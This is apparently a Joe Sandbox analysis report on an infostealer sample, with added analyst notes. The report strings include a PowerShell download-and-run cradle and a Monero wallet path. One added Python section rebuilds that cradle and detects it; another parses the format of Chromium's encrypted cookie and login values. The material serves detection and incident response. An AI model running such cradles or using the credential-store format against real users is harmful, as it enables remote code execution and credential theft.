                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 548bf943f05bc5fae1c7e23359e6d5baa8b413087c674ad3490840a6dc1ac4af
                              • Instruction ID: 0a887099ca7be99f67b51fd8c85a6fc515f32f1c9d7e78b7e67f409850345b10
                              • Opcode Fuzzy Hash: 548bf943f05bc5fae1c7e23359e6d5baa8b413087c674ad3490840a6dc1ac4af
                              • Instruction Fuzzy Hash: 6D3141B290021867CB54FBB0DC85FEE737CAB98700F404989F35996191EE74A7C98B96
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00942D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00942CC4
                              • ')", xrefs: 00942CB3
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00942D04
                              • <, xrefs: 00942D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: c4eaab5251fd0dacf35a727a29254fbddacee558d975840e670c42eafe30329f
                              • Instruction ID: 8e3bdcb1562a49851e8f7ded10a43564eff67b3c59771b9d607be2e5fad8b45e
                              • Opcode Fuzzy Hash: c4eaab5251fd0dacf35a727a29254fbddacee558d975840e670c42eafe30329f
                              • Instruction Fuzzy Hash: 9941CA71C502089AEB14EBA0C892FEDBB78BF94304F504119F416A7192EF746A4ACF96
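The string references in this function (00942D04, 00942CC4, 00942CB3) are the pieces of a PowerShell download-and-execute cradle that the sample concatenates with lstrcpy/lstrcat and hands to ShellExecuteEx: `powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"`. The URL between prefix and suffix is not shown in the report. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it rebuilds that command line from the report's fragments with a placeholder URL, and shows a detector an analyst could run over process-creation command lines (for instance the CommandLine field of Sysmon Event ID 1 or Windows Security Event 4688) to flag the cradle and its common spelling variants. All command lines in the example are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Fragments as listed in the report (string xrefs 00942D04, 00942CC4, 00942CB3).
PS_PATH = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CRADLE_PREFIX = "-nop -c \"iex(New-Object Net.WebClient).DownloadString('"
CRADLE_SUFFIX = "')\""


def build_cradle(url: str) -> str:
    """Reassemble the command line the sample concatenates before ShellExecuteEx.
    The URL is the one piece the report does not show; the caller supplies a placeholder."""
    return f"{PS_PATH} {CRADLE_PREFIX}{url}{CRADLE_SUFFIX}"


# Building blocks of the cradle, matched case-insensitively. powershell.exe accepts
# unambiguous parameter prefixes, so -nop, -nopr and -noprofile are all the same switch.
INDICATORS = {
    "powershell": re.compile(r"powershell(?:\.exe)?\b|\bpwsh(?:\.exe)?\b", re.I),
    "noprofile": re.compile(r"(?<!\S)-nop\w*", re.I),
    "command": re.compile(r"(?<!\S)-c(?:ommand)?\b", re.I),
    "iex": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "webclient": re.compile(r"(?:System\.)?Net\.WebClient", re.I),
    "download": re.compile(r"\.Download(?:String|Data|File)\s*\(", re.I),
}
URL_RE = re.compile(r"""Download(?:String|Data|File)\s*\(\s*['"]([^'"]+)['"]""", re.I)


@dataclass
class CradleVerdict:
    flagged: bool
    indicators: List[str] = field(default_factory=list)
    url: Optional[str] = None


def detect_cradle(cmdline: str) -> CradleVerdict:
    """Flag a process-creation command line that fetches remote code and runs it in memory.

    Rule: an expression-evaluating primitive (iex / Invoke-Expression) together with a
    network fetch (Net.WebClient and/or a Download* method call) is the cradle. -nop and -c
    on their own are common in benign automation and only add context to the verdict."""
    norm = " ".join(cmdline.split())  # collapse line breaks and repeated whitespace
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    flagged = "iex" in hits and ("webclient" in hits or "download" in hits)
    m = URL_RE.search(norm)
    return CradleVerdict(flagged, hits, m.group(1) if m else None)


if __name__ == "__main__":
    # Constructed inputs: the sample's cradle with a placeholder URL, a benign script run,
    # and a re-spelled variant of the same cradle.
    for line in (
        build_cradle("http://example.invalid/a.ps1"),
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
        'PoWeRsHeLl -NoProFile -Command "IEX (New-Object System.Net.WebClient).DownloadString(\'http://example.invalid/stage2\')"',
    ):
        v = detect_cradle(line)
        print(f"flagged={v.flagged!s:5} url={v.url!r} indicators={v.indicators}")
```

Key the rule on the iex plus WebClient/Download combination rather than on the SysWOW64 path: that path only reflects that this 32-bit sample resolves PowerShell through the WOW64 file-system view, and an x64 dropper would launch System32\WindowsPowerShell\v1.0\powershell.exe instead. Because the sample launches via ShellExecuteEx, the PowerShell process will normally appear as a child of file.exe, so the parent/child pair is worth correlating with the command-line match.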
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00939F41
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: a09fcc1b97109f0665aed2a28e188beb30f9216d4b5b17e49cd757d932bf5eb2
                              • Instruction ID: 65168220d856abd56ba6b9c53bba1a94afdb045fb388d3d64cf52fa991fa3d89
                              • Opcode Fuzzy Hash: a09fcc1b97109f0665aed2a28e188beb30f9216d4b5b17e49cd757d932bf5eb2
                              • Instruction Fuzzy Hash: 86612E71A50248EBDB28EFA4CC96FED7775AF85304F008518F90A5F291EB746A06CF52
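The strings v10 and v20 next to ERROR_RUN_EXTRACTOR in this function are, by analyst inference rather than anything the report states, the version prefixes Chromium-based browsers place in front of encrypted cookie and login values: "v10" marks AES-256-GCM ciphertext under the DPAPI-protected key kept in the profile's Local State file, and "v20" marks the app-bound encryption scheme Chrome introduced in 2024, for which stealers need a separate extraction path. The Python below is an added example, not code from the report or from the sample: it parses the value layout an extractor or a forensic tool has to recognise (3-byte prefix, 12-byte GCM nonce, ciphertext, 16-byte GCM tag) and classifies a blob as v10, v20, legacy DPAPI or unknown. It touches no key material and performs no decryption; all blobs it handles are constructed.

```python
from dataclasses import dataclass
from typing import Dict, Iterable, Optional

# Chromium OSCrypt value prefixes (facts about the browser's storage format, not from the report).
V10 = b"v10"   # AES-256-GCM under the DPAPI-protected key from Local State ("encrypted_key")
V20 = b"v20"   # AES-256-GCM under the app-bound key (Chrome 127+, "app_bound_encrypted_key")
# Header every CryptProtectData (DPAPI) blob starts with: version 1 plus the provider GUID.
DPAPI_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

NONCE_LEN = 12   # GCM nonce that follows the 3-byte prefix
TAG_LEN = 16     # GCM authentication tag appended after the ciphertext


@dataclass
class EncryptedValue:
    scheme: str                 # "v10", "v20", "dpapi" or "unknown"
    nonce: Optional[bytes]
    ciphertext: bytes
    tag: Optional[bytes]

    @property
    def plaintext_len(self) -> Optional[int]:
        """GCM is a counter mode: ciphertext length equals plaintext length."""
        return len(self.ciphertext) if self.scheme in ("v10", "v20") else None


def classify_chromium_value(blob: bytes) -> EncryptedValue:
    """Split an encrypted_value / password_value blob into scheme, nonce, ciphertext and tag.

    This is the triage step an extractor performs before choosing a decryption path, and
    the step a forensic tool uses to tell which scheme a profile's stores are in."""
    if blob.startswith(DPAPI_MAGIC):
        return EncryptedValue("dpapi", None, blob, None)  # layout used before Chrome 80
    prefix, body = blob[:3], blob[3:]
    if prefix in (V10, V20) and len(body) >= NONCE_LEN + TAG_LEN:
        return EncryptedValue(
            prefix.decode(),
            body[:NONCE_LEN],
            body[NONCE_LEN:len(body) - TAG_LEN],
            body[-TAG_LEN:],
        )
    return EncryptedValue("unknown", None, blob, None)


def constructed_blob(prefix: bytes, plaintext_len: int) -> bytes:
    """Constructed sample with the real field layout but dummy bytes (not real ciphertext)."""
    nonce = bytes(range(NONCE_LEN))
    return prefix + nonce + b"\xaa" * plaintext_len + b"\xbb" * TAG_LEN


def summarize(blobs: Iterable[bytes]) -> Dict[str, int]:
    """Count values per scheme, e.g. to see whether a profile still holds v10-only data
    (recoverable with the DPAPI-protected key alone) or has moved to v20."""
    counts: Dict[str, int] = {}
    for b in blobs:
        scheme = classify_chromium_value(b).scheme
        counts[scheme] = counts.get(scheme, 0) + 1
    return counts


if __name__ == "__main__":
    sample = constructed_blob(V10, 32)
    v = classify_chromium_value(sample)
    print(v.scheme, v.nonce.hex(), v.plaintext_len, v.tag.hex())
    print(summarize([constructed_blob(V10, 5), constructed_blob(V20, 5), constructed_blob(V20, 9)]))
```

For incident response the useful point is the presence of both prefixes in one extractor: a sample that only knew v10 would be limited to the older DPAPI-protected key, whereas handling v20 as well indicates the tooling was updated after Chrome's app-bound encryption change. The report's ERROR_RUN_EXTRACTOR string is consistent with a failure path in that code, but the report does not say what the extractor is or how it is invoked, so that is left open here.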
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,010FD1C0,00000000,00020119,?), ref: 009440F4
                              • RegQueryValueExA.ADVAPI32(?,010FDDE0,00000000,00000000,00000000,000000FF), ref: 00944118
                              • RegCloseKey.ADVAPI32(?), ref: 00944122
                              • lstrcat.KERNEL32(?,00000000), ref: 00944147
                              • lstrcat.KERNEL32(?,010FDDF8), ref: 0094415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: d64c9dbf844afd8fec059324f6f6724c75fe3623eac015c632c02d6f92831208
                              • Instruction ID: 082814f6d9aceca3869486122b8837fef2b73a26c9e860e243b01101ecd16051
                              • Opcode Fuzzy Hash: d64c9dbf844afd8fec059324f6f6724c75fe3623eac015c632c02d6f92831208
                              • Instruction Fuzzy Hash: B84136B69101086BDB14FBA0DC56FFE737DABC8300F408958B61A97191EE755BC88B92
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0094696C
                              • sscanf.NTDLL ref: 00946999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009469B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009469C0
                              • ExitProcess.KERNEL32 ref: 009469DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 90556541c18bcc4e00ab5846a8862590d30c01e675ec810e49d8745d3099aed4
                              • Instruction ID: 1a33a7592e363b96728b3b579c205a8d2b6f067eb85f8be201709affaeb25968
                              • Opcode Fuzzy Hash: 90556541c18bcc4e00ab5846a8862590d30c01e675ec810e49d8745d3099aed4
                              • Instruction Fuzzy Hash: A721EDB5D14208ABCF44EFE4D945AEEB7B9FF88300F04452EE40AE3250EB345605CB66
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00947E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,010EBC30,00000000,00020119,?), ref: 00947E5E
                              • RegQueryValueExA.ADVAPI32(?,010FD300,00000000,00000000,000000FF,000000FF), ref: 00947E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00947E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 0094cd8be22f880ee20b2101ae6d5c608075f3914c60c5d05ae487811259668d
                              • Instruction ID: 0a4364deea0058c03ef07c25006cb45593646a869f9e85812f7d82d2b35225f8
                              • Opcode Fuzzy Hash: 0094cd8be22f880ee20b2101ae6d5c608075f3914c60c5d05ae487811259668d
                              • Instruction Fuzzy Hash: 59118FB1A44209EBD714CFD4DC49F7FBBB8EB84701F104259F609A7290DB7459008BA2
                              APIs
                              • StrStrA.SHLWAPI(010FDCD8,?,?,?,0094140C,?,010FDCD8,00000000), ref: 0094926C
                              • lstrcpyn.KERNEL32(00B7AB88,010FDCD8,010FDCD8,?,0094140C,?,010FDCD8), ref: 00949290
                              • lstrlen.KERNEL32(?,?,0094140C,?,010FDCD8), ref: 009492A7
                              • wsprintfA.USER32 ref: 009492C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: c2f8e0a0e9068323b57844ee1236f2fa0826e3fda0a1ea4e6fbd2866c4c983f1
                              • Instruction ID: 5d1e7e5132ddff1c5b8a85b43fc11de4dad9db2425c51411496f0d2f239454a6
                              • Opcode Fuzzy Hash: c2f8e0a0e9068323b57844ee1236f2fa0826e3fda0a1ea4e6fbd2866c4c983f1
                              • Instruction Fuzzy Hash: 6401A975500108FFCB44DFE8C984EAE7BB9EB88355F108548F9199B304CA71AA40DB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009312B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009312BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009312D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009312F5
                              • RegCloseKey.ADVAPI32(?), ref: 009312FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 8aef21ada0ee6bef2d046a99f8350241ea5d1f4eeabdaaf6dcc820ba497a32b4
                              • Instruction ID: 3e7223f5cd3ca583ca51a5c2940504197db57c7e5ce8bfc2c69a6f51b6b4bdbc
                              • Opcode Fuzzy Hash: 8aef21ada0ee6bef2d046a99f8350241ea5d1f4eeabdaaf6dcc820ba497a32b4
                              • Instruction Fuzzy Hash: 0B0131B9A40208BBDB04DFE0DC49FAEB7BCEB88701F008159FA09972C0DA709A418F51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: e648a6119ac9774517cb38b06df1bf7927437347615a2840a351a8d74d86f603
                              • Instruction ID: 0da47f9afac2de287cb48ddcf264414810c105ff7a520abf3eaefe304bcf3273
                              • Opcode Fuzzy Hash: e648a6119ac9774517cb38b06df1bf7927437347615a2840a351a8d74d86f603
                              • Instruction Fuzzy Hash: DF41F9B150175C6EDB258B24CD94FFBBBECAF45704F1448E8E9CA86182E2719A44DF60
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00946663
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00946726
                              • ExitProcess.KERNEL32 ref: 00946755
                              Strings
                              Memory Dump Source
